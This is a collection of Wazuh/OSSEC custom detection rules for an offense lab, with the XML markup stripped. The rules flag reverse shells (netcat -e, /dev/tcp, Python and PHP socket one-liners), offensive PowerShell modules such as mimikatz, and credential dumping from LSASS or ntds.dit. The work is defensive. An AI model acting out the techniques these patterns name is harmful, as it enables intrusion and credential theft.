├── README.md ├── custom_remove_winlogon_events.xml ├── custom_linux.xml ├── custom_rdp.xml ├── custom_web_attack_rules.xml ├── custom_revshell_linux.xml ├── custom_windows_powershell_sysmon.xml ├── custom_windows_powershell_eventlog.xml ├── custom_sysmon_linux_groups.xml ├── custom_linux_syslog.xml ├── custom_sysmon_linux_rules.xml └── custom_sysmon_rules.xml /README.md: -------------------------------------------------------------------------------- 1 | # Wazuh Detection Rules 2 | Our collection of OSSEC detection rules for our Offense Lab. Drop these in /var/ossec/etc/rules/. 3 | -------------------------------------------------------------------------------- /custom_remove_winlogon_events.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | 60106,60137 8 | (^HealthMailbox.*$)||(^.*\$$) 9 | Ignore Windows Logon/Logoff Success 10 | no_full_log 11 | authentication_success,pci_dss_10.2.5,gpg13_7.1,gpg13_7.2,gdpr_IV_32.2, 12 | 13 | 14 | 15 | 60106,60137 16 | ^.*\$$ 17 | Ignore Windows Logon/Logoff Success 18 | no_full_log 19 | authentication_success,pci_dss_10.2.5,gpg13_7.1,gpg13_7.2,gdpr_IV_32.2, 20 | 21 | 22 | -------------------------------------------------------------------------------- /custom_linux.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | 8 | 5555 9 | password changed for root 10 | Root password changed 11 | 12 | 13 | 14 | ^new group 15 | New group added to the system 16 | 17 | 18 | 19 | 5902 20 | GID=0|GID=10 21 | User created in group WHEEL or ROOT 22 | 23 | 24 | 25 | usermod|useradd 26 | add '\S+' to group 'root'|add '\S+' to group 'wheel' 27 | User added into group WHEEL or ROOT 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /custom_rdp.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | 8 | 9 | 60009 10 | ^Microsoft-Windows-TerminalServices-LocalSessionManager/Operational$ 11 | no_full_log 12 | Group of Windows rules for the Local Session Manager channel 13 | 14 | 15 | 16 | 999000 17 | 21 18 | Remote Desktop Session Logon 19 | 20 | 21 | 22 | 999000 23 | 23 24 | Remote Desktop Session Logoff 25 | 26 | 27 | 28 | 999000 29 | 24 30 | Remote Desktop Session Disconnected 31 | 32 | 33 | 34 | 999000 35 | 25 36 | Remote Desktop Session Reconnected 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /custom_web_attack_rules.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 31100 7 | Nikto 8 | Nikto user agent detected (known malicious user agent). 9 | pci_dss_6.5,pci_dss_11.4,gdpr_IV_35.7.d,nist_800_53_SA.11,nist_800_53_SI.4,tsc_CC6.6,tsc_CC7.1,tsc_CC8.1,tsc_CC6.1,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3, 10 | 11 | 12 | 31100 13 | WPScan 14 | WPScan user agent detected (known malicious user agent). 15 | pci_dss_6.5,pci_dss_11.4,gdpr_IV_35.7.d,nist_800_53_SA.11,nist_800_53_SI.4,tsc_CC6.6,tsc_CC7.1,tsc_CC8.1,tsc_CC6.1,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3, 16 | 17 | 18 | 31100 19 | Nikto 20 | Application under attack - Nikto scan detected (known malicious user agent). 21 | pci_dss_6.5,pci_dss_11.4,gdpr_IV_35.7.d,nist_800_53_SA.11,nist_800_53_SI.4,tsc_CC6.6,tsc_CC7.1,tsc_CC8.1,tsc_CC6.1,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3, 22 | 23 | 24 | 31100 25 | WPScan 26 | Application under attack - WPScan scan detected (known malicious user agent). 27 | pci_dss_6.5,pci_dss_11.4,gdpr_IV_35.7.d,nist_800_53_SA.11,nist_800_53_SI.4,tsc_CC6.6,tsc_CC7.1,tsc_CC8.1,tsc_CC6.1,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3, 28 | 29 | 30 | 31100 31 | POST / 32 | /xmlrpc.php 33 | Potention password attack against xmlrpc.php 34 | pci_dss_6.5,pci_dss_11.4,gdpr_IV_35.7.d,nist_800_53_SA.11,nist_800_53_SI.4,tsc_CC6.6,tsc_CC7.1,tsc_CC8.1,tsc_CC6.1,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3, 35 | 36 | 37 | -------------------------------------------------------------------------------- /custom_revshell_linux.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 10 | 80789 11 | /usr/bin/nc 12 | Netcat usage detected. 13 | audit_command, 14 | 15 | 16 | 110000 17 | -e 18 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 19 | audit_command, 20 | 21 | 22 | 23 | 24 | 80789 25 | /usr/bin/bash 26 | Bash usage detected. 27 | audit_command, 28 | 29 | 30 | 110020 31 | /dev/tcp/ 32 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 33 | audit_command, 34 | 35 | 36 | 110020 37 | /dev/udp/ 38 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 39 | audit_command, 40 | 41 | 42 | 43 | 44 | 80789 45 | /usr/bin/python|/usr/bin/python2|/usr/bin/python3 46 | Python usage detected. 47 | audit_command, 48 | 49 | 50 | 110030 51 | -c 52 | socket.socket 53 | subprocess.call 54 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 55 | audit_command, 56 | 57 | 58 | 59 | 60 | 61 | 80789 62 | /usr/bin/php 63 | PHP usage detected. 64 | audit_command, 65 | 66 | 67 | 110050 68 | -r 69 | fsockopen 70 | exec 71 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 72 | audit_command, 73 | 74 | 75 | -------------------------------------------------------------------------------- /custom_windows_powershell_sysmon.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | sysmon_event1 7 | powershell.exe 8 | Sysmon - Powershell Use Detected 9 | 10 | 11 | 12 | 184778 13 | -enc 14 | Amazon 15 | powershell.exe -ExecutionPolicy Restricted -Command Write-Host 16 | Sysmon - Powershell Encoding Detected 17 | 18 | 19 | 20 | 184778 21 | -w hidden|-window hidden|-windowstyle hidden 22 | Amazon 23 | powershell.exe -ExecutionPolicy Restricted -Command Write-Host 24 | Sysmon - Powershell Hidden Window Detected 25 | 26 | 27 | 28 | 184778 29 | -ep|-ExecutionPolicy|-Exec 30 | Amazon 31 | powershell.exe -ExecutionPolicy Restricted -Command Write-Host 32 | Sysmon - Powershell ExecutionPolicy Bypass Detected 33 | 34 | 35 | 36 | 184778 37 | DownloadString|DownloadFile 38 | Sysmon - Powershell Downloader Function Detected 39 | 40 | 41 | 42 | 184778 43 | http://|https:// 44 | Sysmon - Powershell URL in script Detected 45 | 46 | 47 | 48 | 184778 49 | -nop|-noprofile 50 | Amazon 51 | powershell.exe -ExecutionPolicy Restricted -Command Write-Host 52 | Sysmon - Powershell NoProfile Execution Detected 53 | 54 | 55 | 56 | 184778 57 | cmd.exe|excel.exe|msiexec.exe|winword.exe|wmiprvse.exe|explorer.exe|wscript.exe 58 | Sysmon - Powershell Started Indirectly 59 | 60 | 61 | 62 | 184778 63 | Invoke 64 | Sysmon - Powershell Invoke- Detected 65 | 66 | 67 | 68 | 184778 69 | PSSession 70 | Sysmon - Powershell Remote Session Use Detected 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /custom_windows_powershell_eventlog.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | 60000 8 | ^Microsoft-Windows-Powershell/Operational$ 9 | no_full_log 10 | Group of Windows rules for the Powershell channel 11 | 12 | 13 | 68000 14 | 4104 15 | Powershell - Script executed 16 | Powershell_event, 17 | 18 | 19 | 20 | 68001 21 | runtime.interopservices.marshal 22 | PowerShell - Potential in-memory C# via powershell 23 | 24 | 25 | 26 | 68001 27 | Invoke-DllInjection|Invoke-Shellcode|Invoke-WmiCommand|Get-GPPPassword|Get-Keystrokes|Get-TimedScreenshot|Get-VaultCredential|Invoke-CredentialInjection|mimikatz|Invoke-NinjaCopy|Invoke-TokenManipulation|Out-Minidump|VolumeShadowCopyTools|Invoke-ReflectivePEInjection|Invoke-UserHunter|Find-GPOLocation|Invoke-ACLScanner|Invoke-DowngradeAccount|Get-ServiceUnquoted|Get-ServiceFilePermission|Get-ServicePermission|Invoke-ServiceAbuse|Install-ServiceBinary|Get-RegAutoLogon|Get-VulnAutoRun|Get-VulnSchTask|Get-UnattendedInstallFile|Get-WebConfig|Get-ApplicationHost|Get-RegAlwaysInstallElevated|Get-Unconstrained|Add-RegBackdoor|Add-ScrnSaveBackdoor|Gupt-Backdoor|Invoke-ADSBackdoor|Enabled-DuplicateToken|Invoke-PsUaCme|Remove-Update|Check-VM|Get-LSASecret|Get-PassHashes|Show-TargetScreen|Port-Scan|netscan|psscan|Invoke-PoshRatHttp|Invoke-PowerShellTCP|Invoke-PowerShellWMI|Add-Exfiltration|Add-Persistence|Do-Exfiltration|Start-CaptureServer|Invoke-DllInjection|Invoke-ReflectivePEInjection|Invoke-ShellCode|Get-ChromeDump|Get-ClipboardContents|Get-FoxDump|Get-IndexedItem|Get-Keystrokes|Get-Screenshot|Invoke-Inveigh|Invoke-NetRipper|Invoke-NinjaCopy|Out-Minidump|Invoke-EgressCheck|Invoke-PSInject|Invoke-RunAs|MailRaider|New-HoneyHash|Set-MacAttribute|Get-VaultCredential|Invoke-DCSync|Invoke-PowerDump|Invoke-TokenManipulation|Exploit-Jboss|Invoke-ThunderStruck|Invoke-VoiceTroll|Invoke-InveighRelay|Invoke-PsExec|Invoke-SSHCommand|Get-SecurityPackages|Install-SSP|Invoke-BackdoorLNK|PowerBreach|Get-GPPPassword|Get-SiteListPassword|Get-System|BypassUAC|Invoke-Tater|PowerUp|PowerView|Get-RickAstley|Find-Fruit|HTTP-Login|Find-TrustedDocuments|Invoke-Paranoia|Invoke-WinEnum|Invoke-ARPScan|Invoke-ReverseDNSLookup|smbscanner|Invoke-FruityC2|Invoke-Stager 28 | Amazon 29 | Get-SystemDriveInfo 30 | PowerShell - Potentially malicious command detected 31 | 32 | 33 | 34 | 68001 35 | DownloadString|downloadfile 36 | PowerShell - Potential download - could be legitimate 37 | 38 | 39 | 45 | 46 | -------------------------------------------------------------------------------- /custom_sysmon_linux_groups.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | sysmon-linux 10 | Sysmon For Linux Group. 11 | 12 | 13 | 14 | 150000 15 | ^1$ 16 | Sysmon Event ID 1 17 | sysmon_linux_event1, 18 | 19 | 20 | 21 | 150000 22 | ^2$ 23 | Sysmon Event ID 2 24 | sysmon_linux_event2, 25 | 26 | 27 | 28 | 150000 29 | ^3$ 30 | Sysmon Event ID 3 31 | sysmon_linux_event3, 32 | 33 | 34 | 35 | 150000 36 | ^4$ 37 | Sysmon Event ID 4 38 | sysmon_linux_event4, 39 | 40 | 41 | 42 | 150000 43 | ^5$ 44 | Sysmon Event ID 5 45 | sysmon_linux_event5, 46 | 47 | 48 | 49 | 150000 50 | ^6$ 51 | Sysmon Event ID 6 52 | sysmon_linux_event6, 53 | 54 | 55 | 56 | 150000 57 | ^7$ 58 | Sysmon Event ID 7 59 | sysmon_linux_event7, 60 | 61 | 62 | 63 | 150000 64 | ^8$ 65 | Sysmon Event ID 8 66 | sysmon_linux_event8, 67 | 68 | 69 | 70 | 150000 71 | ^9$ 72 | Sysmon Event ID 9 73 | sysmon_linux_event9, 74 | 75 | 76 | 77 | 78 | 150000 79 | ^10$ 80 | Sysmon Event ID 10 81 | sysmon_linux_event10, 82 | 83 | 84 | 85 | 150000 86 | ^11$ 87 | Sysmon Event ID 11 88 | sysmon_linux_event11, 89 | 90 | 91 | 92 | 150000 93 | ^12$ 94 | Sysmon Event ID 12 95 | sysmon_linux_event12, 96 | 97 | 98 | 99 | 150000 100 | ^13$ 101 | Sysmon Event ID 13 102 | sysmon_linux_event13, 103 | 104 | 105 | 106 | 150000 107 | ^14$ 108 | Sysmon Event ID 14 109 | sysmon_linux_event14, 110 | 111 | 112 | 113 | 150000 114 | ^15$ 115 | Sysmon Event ID 15 116 | sysmon_linux_event15, 117 | 118 | 119 | 120 | 150000 121 | ^16$ 122 | Sysmon Event ID 16 123 | sysmon_linux_event16, 124 | 125 | 126 | 127 | 150000 128 | ^17$ 129 | Sysmon Event ID 17 130 | sysmon_linux_event17, 131 | 132 | 133 | 134 | 150000 135 | ^18$ 136 | Sysmon Event ID 18 137 | sysmon_linux_event18, 138 | 139 | 140 | 141 | 150000 142 | ^19$ 143 | Sysmon Event ID 19 144 | sysmon_linux_event19, 145 | 146 | 147 | 148 | 150000 149 | ^20$ 150 | Sysmon Event ID 20 151 | sysmon_linux_event20, 152 | 153 | 154 | 155 | 150000 156 | ^21$ 157 | Sysmon Event ID 21 158 | sysmon_linux_event21, 159 | 160 | 161 | 162 | 150000 163 | ^22$ 164 | Sysmon Event ID 22 165 | sysmon_linux_event22, 166 | 167 | 168 | 169 | 150000 170 | ^23$ 171 | Sysmon Event ID 23 172 | sysmon_linux_event23, 173 | 174 | 175 | 176 | 150000 177 | ^24$ 178 | Sysmon Event ID 24 179 | sysmon_linux_event24, 180 | 181 | 182 | 183 | 150000 184 | ^25$ 185 | Sysmon Event ID 25 186 | sysmon_linux_event25, 187 | 188 | 189 | 190 | 150000 191 | ^26$ 192 | Sysmon Event ID 26 193 | sysmon_linux_event26, 194 | 195 | 196 | 197 | 150000 198 | ^255$ 199 | Sysmon Event ID 255 200 | sysmon_linux_event255, 201 | 202 | 203 | -------------------------------------------------------------------------------- /custom_linux_syslog.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 80789 5 | /usr/bin/nc|nc|ncat 6 | Netcat usage detected. 7 | 8 | 9 | 111000 10 | -e 11 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 12 | 13 | 14 | 111000 15 | -c 16 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 17 | 18 | 19 | 20 | 21 | 22 | 23 | 80789 24 | /usr/bin/nmap 25 | Nmap usage detected. 26 | 27 | 28 | 29 | 30 | 31 | ^usercommand 32 | usercommand detected. 33 | 34 | 35 | 36 | 37 | 101000 38 | sh 39 | Potential Shell Usage. 40 | 41 | 42 | 101020 43 | /dev/tcp/ 44 | Potential Shell Detected. 45 | 46 | 47 | 101020 48 | /dev/udp/ 49 | Potential Shell Detected. 50 | 51 | 52 | 53 | 54 | 101000 55 | python 56 | Potential Python Usage. 57 | 58 | 59 | 101040 60 | -c 61 | socket 62 | subprocess 63 | call 64 | Potential Shell Detected. 65 | 66 | 67 | 101040 68 | -c 69 | socket 70 | pty 71 | spawn 72 | Potential Shell Detected. 73 | 74 | 75 | 76 | 77 | 101000 78 | php 79 | PHP usage detected. 80 | 81 | 82 | 101060 83 | -r 84 | fsockopen 85 | exec|shell_exec|system|passthru|popen|` 86 | Potential Shell Detected. 87 | 88 | 89 | 90 | 91 | 101000 92 | perl 93 | Perl usage detected. 94 | 95 | 96 | 101080 97 | -e 98 | socket 99 | connect 100 | Potential Shell Detected. 101 | 102 | 103 | 101080 104 | -MIO 105 | -e 106 | Socket 107 | Potential Shell Detected. 108 | 109 | 110 | 111 | 112 | 101000 113 | socat 114 | Socat usage detected. 115 | 116 | 117 | 101100 118 | exec 119 | tcp 120 | Potential Shell Detected. 121 | 122 | 123 | 124 | 125 | 101000 126 | ruby 127 | Socat usage detected. 128 | 129 | 130 | 101120 131 | -rsocket 132 | -e 133 | tcpsocket 134 | Potential Shell Detected. 135 | 136 | 137 | 138 | 139 | 101000 140 | xterm 141 | Xterm usage detected. 142 | 143 | 144 | 101140 145 | -display 146 | Potential Shell Detected. 147 | 148 | 149 | 150 | 151 | 101000 152 | xhost 153 | xhost usage detected. 154 | 155 | 156 | 157 | 158 | 101000 159 | Xnest 160 | Xnest usage detected. 161 | 162 | 163 | 164 | 165 | 101000 166 | nc 167 | Netcat usage detected. 168 | 169 | 170 | 101200 171 | rm 172 | mkfifo|mknod 173 | Potential Shell Detected. 174 | 175 | 176 | 177 | 178 | 101000 179 | awk 180 | awk usage detected. 181 | 182 | 183 | 101220 184 | /inet/tcp/ 185 | Potential Shell Detected. 186 | 187 | 188 | 189 | 190 | 101000 191 | telnet 192 | telnet usage detected. 193 | 194 | 195 | 101240 196 | sh 197 | Potential Shell Detected. 198 | 199 | 200 | 201 | 202 | 101000 203 | lua 204 | lua usage detected. 205 | 206 | 207 | 101260 208 | socket 209 | execute 210 | Potential Shell Detected. 211 | 212 | 213 | -------------------------------------------------------------------------------- /custom_sysmon_linux_rules.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | sysmon_linux_event1 7 | /usr/bin/nc|nc|ncat 8 | SysmonForLinux - Netcat usage detected. 9 | 10 | 11 | 151000 12 | no_full_log 13 | -e 14 | SysmonForLinux - Potential Shell Detected. 15 | reverse_shells, 16 | 17 | 18 | 151001 19 | 20 | SysmonForLinux - Potential Shell Detected. 21 | reverse_shells, 22 | 23 | 24 | 151000 25 | no_full_log 26 | -c 27 | SysmonForLinux - Potential Shell Detected. 28 | reverse_shells, 29 | 30 | 31 | 151003 32 | 33 | SysmonForLinux - Potential Shell Detected. 34 | reverse_shells, 35 | 36 | 37 | 38 | sysmon_linux_event3 39 | no_full_log 40 | sh|bash|dash|fish|zsh|ksh|csh|busybox|tcsh|tclsh 41 | SysmonForLinux - Shell connecting to $(eventdata.destinationIp) on port $(eventdata.destinationPort). 42 | 43 | 44 | 45 | 46 | 151010 47 | SysmonForLinux - Shell connecting to $(eventdata.destinationIp) on port $(eventdata.destinationPort). 48 | 49 | 50 | 51 | sysmon_linux_event1 52 | python 53 | SysmonForLinux - Python usage detected. 54 | 55 | 56 | 151020 57 | -c 58 | socket 59 | subprocess 60 | call 61 | SysmonForLinux - Potential Python Shell Detected. 62 | reverse_shells, 63 | 64 | 65 | 151020 66 | -c 67 | socket 68 | pty 69 | spawn 70 | SysmonForLinux - Potential Python Shell Detected. 71 | reverse_shells, 72 | 73 | 74 | 75 | sysmon_linux_event3 76 | ^/tmp|^/home|^/root 77 | no_full_log 78 | SysmonForLinux - Program connecting to $(eventdata.destinationIp) on port $(eventdata.destinationPort) from binary in uncommon location. 79 | 80 | 81 | 82 | 151030 83 | 84 | ^/tmp|^/home|^/root 85 | SysmonForLinux - Program connecting to $(eventdata.destinationIp) on port $(eventdata.destinationPort) from binary in uncommon location. 86 | 87 | 88 | 89 | sysmon_linux_event1 90 | php 91 | SysmonForLinux - PHP usage detected. 92 | 93 | 94 | 151040 95 | -r 96 | fsockopen 97 | exec|shell_exec|system|passthru|popen|` 98 | SysmonForLinux - Potential PHP Shell Detected. 99 | reverse_shells, 100 | 101 | 102 | 103 | 104 | 105 | sysmon_linux_event1 106 | perl 107 | Perl usage detected. 108 | 109 | 110 | 151050 111 | -e 112 | socket 113 | connect 114 | Potential Perl Shell Detected. 115 | 116 | 117 | 151050 118 | -MIO 119 | -e 120 | Socket 121 | Potential Perl Shell Detected. 122 | 123 | 124 | 125 | 126 | 127 | 128 | sysmon_linux_event1 129 | socat 130 | Socat usage detected. 131 | 132 | 133 | 151060 134 | exec 135 | tcp 136 | SysmonForLinux - Potential Shell Detected. 137 | 138 | 139 | 140 | 141 | sysmon_linux_event1 142 | ruby 143 | Socat usage detected. 144 | 145 | 146 | 151070 147 | -rsocket 148 | -e 149 | tcpsocket 150 | SysmonForLinux - Potential Shell Detected. 151 | 152 | 153 | 154 | 155 | sysmon_linux_event1 156 | xterm 157 | Xterm usage detected. 158 | 159 | 160 | 151080 161 | -display 162 | SysmonForLinux - Potential Shell Detected. 163 | 164 | 165 | 166 | 167 | sysmon_linux_event1 168 | xhost 169 | xhost usage detected. 170 | 171 | 172 | 173 | 174 | sysmon_linux_event1 175 | Xnest 176 | Xnest usage detected. 177 | 178 | 179 | 180 | 181 | sysmon_linux_event1 182 | nc 183 | Netcat usage detected. 184 | 185 | 186 | 151110 187 | rm 188 | mkfifo|mknod 189 | SysmonForLinux - Potential Shell Detected. 190 | 191 | 192 | 193 | 194 | sysmon_linux_event1 195 | awk 196 | awk usage detected. 197 | 198 | 199 | 151120 200 | /inet/tcp/ 201 | SysmonForLinux - Potential Shell Detected. 202 | 203 | 204 | 205 | 206 | sysmon_linux_event1 207 | telnet 208 | telnet usage detected. 209 | 210 | 211 | 151130 212 | sh 213 | SysmonForLinux - Potential Shell Detected. 214 | 215 | 216 | 217 | 218 | sysmon_linux_event1 219 | lua 220 | lua usage detected. 221 | 222 | 223 | 151140 224 | socket 225 | execute 226 | SysmonForLinux - Potential Shell Detected. 227 | 228 | 229 | 230 | 231 | sysmon_linux_event1 232 | nmap 233 | SysmonForLinux - Nmap usage detected. 234 | recon, 235 | 236 | 237 | -------------------------------------------------------------------------------- /custom_sysmon_rules.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | sysmon_event1 8 | rundll32.exe$ 9 | Sysmon - rundll32.exe execution 10 | 11 | 12 | 13 | 300000 14 | vaultcli.dll 15 | Sysmon - Possible Mimikatz Running In-Memory 16 | 17 | 18 | 19 | 300000 20 | wlanapi.dll 21 | Sysmon - Possible Mimikatz In-Memory 22 | 23 | 24 | 25 | 26 | sysmon_event1 27 | mshta.exe$ 28 | Sysmon - mshta.exe 29 | 30 | 31 | 32 | 300020 33 | cmd.exe$|powershell.exe$|wscript.exe$|cscript.exe$|sh.exe$|bash.exe$|reg.exe$|regsvr32.exe$|BITSADMIN* 34 | Sysmon - Detected a Windows command line executable started from MSHTA 35 | 36 | 37 | 38 | 39 | sysmon_event1 40 | WINWORD.EXE$|EXCEL.EXE$|POWERPNT.exe$|MSPUB.exe$|VISIO.exe$ 41 | Sysmon - MS Office binary running 42 | 43 | 44 | 45 | 46 | 300040 47 | cmd.exe$ 48 | Sysmon - Possible Office Macro Started : $(win.eventdata.image) 49 | 50 | 51 | 300040 52 | cmd.exe$|powershell.exe$|wscript.exe$|cscript.exe$|sh.exe$|bash.exe$|scrcons.exe$|schtasks.exe$|regsvr32.exe$|hh.exe$ 53 | Sysmon - Microsoft Office Product Spawning Windows Shell 54 | 55 | 56 | 57 | sysmon_event8 58 | lsass.exe$ 59 | Sysmon - Lsass target 60 | 61 | 62 | 63 | 300060 64 | null 65 | Sysmon - Password Dumper Remote Thread in LSASS 66 | 67 | 68 | 69 | sysmon_event8 70 | Sysmon - Remote Thread Creation Detected from $(win.eventdata.sourceImage) to $(win.eventdata.targetImage), might indicate process injection! 71 | 72 | 73 | 74 | 75 | sysmon_event3 76 | rundll32.exe$ 77 | Sysmon - Rundll32 communicating over the network 78 | 79 | 80 | 81 | 300080 82 | Sysmon - Rundll32 communicating over the network 83 | 84 | 85 | 86 | sysmon_event1 87 | certutil.exe$ 88 | Sysmon - Certutil execution 89 | 90 | 91 | 92 | 300100 93 | URL|decode|decodehex|urlcache|ping 94 | Sysmon - Certutil used to download or decode 95 | 96 | 97 | 98 | 99 | sysmon_event1 100 | control.exe$ 101 | Sysmon - Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits 102 | 103 | 104 | 105 | 106 | 300120 107 | rundll32.exe$ 108 | Sysmon - Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits 109 | 110 | 111 | 112 | 300121 113 | timedate.cpl 114 | Sysmon - Exclude 115 | 116 | 117 | 118 | sysmon_event6 119 | \\Temp 120 | Sysmon - Detects a driver load from a temporary directory 121 | 122 | 123 | 124 | sysmon_event1 125 | ^C:\\\\PerfLogs\\\\|^C:\\\\\$Recycle.bin\\\\|^C:\\\\Intel\\\\Logs\\\\|^C:\\\\Users\\\\Default\\\\|^C:\\\\Users\\\\Public\\\\|^C:\\\\Users\\\\NetworkService\\\\|^C:\\\\Windows\\\\Fonts\\\\|^C:\\\\Windows\\\\Debug\\\\|^C:\\\\Windows\\\\Media\\\\|^C:\\\\Windows\\\\Help\\\\|^C:\\\\Windows\\\\addins\\\\|^C:\\\\Windows\\\\repair\\\\|^C:\\\\Windows\\\\security\\\\|\\\\RSA\\\\MachineKeys\\\\|^C:\\\\Windows\\\\system32\\\\config\\\\systemprofile 126 | Sysmon - Detects process starts of binaries from a suspicious folder 127 | 128 | 129 | 130 | sysmon_event1 131 | mmc.exe$ 132 | Sysmon - Processes started by MMC could by a sign of lateral movement using MMC application COM object 133 | 134 | 135 | 136 | 300160 137 | cmd.exe$ 138 | Sysmon - Processes started by MMC could by a sign of lateral movement using MMC application COM object 139 | 140 | 141 | 142 | 300160 143 | powershell.exe$ 144 | Sysmon - Processes started by MMC could by a sign of lateral movement using MMC application COM object 145 | 146 | 147 | 148 | 149 | 150 | 151 | sysmon_event1 152 | net.exe$|net1.exe$ 153 | Detects execution of Net.exe, whether suspicious or benign. 154 | 155 | 156 | 157 | 158 | 300180 159 | group|localgroup|user|view|share|accounts|use 160 | Sysmon - Detects execution of Net.exe, whether suspicious or benign 161 | 162 | 163 | 164 | 300180 165 | net group "domain admins" /domain|net localgroup administrators|net1 group "domain admins" /domain|net1 localgroup administrators 166 | Sysmon - Enumeration of privileged users/groups 167 | 168 | 169 | 170 | sysmon_event1 171 | wscript.exe$|cscript.exe$ 172 | Sysmon - wscript/cscript.exe 173 | 174 | 175 | 176 | 300200 177 | powershell.exe$ 178 | Sysmon - Detects suspicious powershell invocations from interpreters or unusual programs 179 | 180 | 181 | 182 | 183 | 300200 184 | cmd.exe$ 185 | Sysmon - Detects suspicious powershell invocations from interpreters or unusual programs 186 | 187 | 188 | 189 | 300200 190 | getfilecounts.vbs 191 | Sysmon - Exclude 192 | 193 | 194 | 195 | sysmon_event1 196 | regsvr32.exe$ 197 | Sysmon - Detects various anomalies in relation to regsvr32.exe 198 | 199 | 200 | 201 | 300220 202 | \\\\Temp 203 | Sysmon - Detects various anomalies in relation to regsvr32.exe 204 | 205 | 206 | 207 | 300220 208 | powershell.exe 209 | Sysmon - Detects various anomalies in relation to regsvr32.exe 210 | 211 | 212 | 213 | 300220 214 | scrobj.dll 215 | Sysmon - Detects various anomalies in relation to regsvr32.exe 216 | 217 | 218 | 219 | sysmon_event1 220 | schtasks.exe$ 221 | Sysmon - Detects the creation of scheduled tasks in user session 222 | 223 | 224 | 225 | 300240 226 | /create 227 | Sysmon - Detects the creation of scheduled tasks in user session 228 | 229 | 230 | 231 | sysmon_event1 232 | wscript.exe$|cscript.exe$ 233 | Sysmon - Detects various anomalies in relation to wscriptcscript 234 | 235 | 236 | 237 | 300260 238 | jse|vbe|js|vba 239 | Sysmon - Detects suspicious file execution by wscript and cscript 240 | 241 | 242 | 243 | 244 | sysmon_event1 245 | svchost.exe$ 246 | Sysmon - Suspicious Svchost Process 247 | 248 | 249 | 250 | 300280 251 | services.exe$ 252 | Sysmon - Detects a suspicious scvhost process start 253 | 254 | 255 | 256 | 257 | sysmon_event1 258 | vssadmin.exe Delete Shadows|vssadmin create shadow|GLOBALROOT|vssadmin delete shadows|reg SAVE HKLM\\\\SYSTEM|\\\\windows\\\\ntds\\\\ntds.dit 259 | Sysmon - Detects suspicious commands that could be related to activity that uses volume shadow copy 260 | 261 | 262 | 263 | sysmon_event1 264 | wmic.exe$ 265 | Sysmon - Detects WMI executing suspicious commands 266 | 267 | 268 | 269 | 300320 270 | process call create|AntiVirusProduct get|FirewallProduct get|shadowcopy delete 271 | Sysmon - Detects WMI executing suspicious commands 272 | 273 | 274 | 275 | 276 | 277 | 278 | 279 | sysmon_event1 280 | transport=dt_socket,address= 281 | Sysmon - Detects a JAVA process running with remote debugging allowing more than just localhost to connect 282 | 283 | 284 | 285 | sysmon_event1 286 | WINWORD.EXE$|EXCEL.EXE$|POWERPNT.exe$|MSPUB.exe$|VISIO.exe$ 287 | Sysmon - MS Word 288 | 289 | 290 | 291 | 300360 292 | sysmon_event1 293 | csc.exe$ 294 | Sysmon - Detects Office process starting uncommon sub process csc.exe as used in exploits 295 | 296 | 297 | 298 | 300361 299 | xj6r_ru4.cmdline 300 | Sysmon - Exclude 301 | 302 | 303 | 304 | sysmon_event1 305 | apache|tomcat|w3wp.exe$|php-cgi.exe$|nginx.exe$|httpd.exe$ 306 | Sysmon - Webshell detection 307 | 308 | 309 | 310 | 300380 311 | whoami|net user|ping -n|systeminfo 312 | Sysmon - Webshell detection 313 | 314 | 315 | 316 | sysmon_event1 317 | bitsadmin.exe$ 318 | Sysmon - Bitsadmin.exe detection 319 | 320 | 321 | 322 | 300400 323 | /transfer 324 | Sysmon - Detects usage of bitsadmin to download a file 325 | 326 | 327 | 328 | 329 | 184666 330 | MsMpEng.exe 331 | Sysmon - Exclude 332 | 333 | 334 | 335 | sysmon_event1 336 | mshta.exe$ 337 | Sysmon - mshta.exe detected 338 | 339 | 340 | 341 | 342 | 343 | sysmon_event1 344 | conhost.exe$ 345 | Sysmon - Mimikatz Detection Parent Image $(win.eventdata.parentImage) 346 | 347 | 348 | 300460 349 | mimikatz.exe$ 350 | Sysmon - Mimikatz Detection Image: $(win.eventdata.parentImage) 351 | 352 | 353 | 354 | 355 | sysmon_event1 356 | mimikatz.exe$ 357 | Sysmon - Mimikatz Execution Detected 358 | 359 | 360 | 361 | --------------------------------------------------------------------------------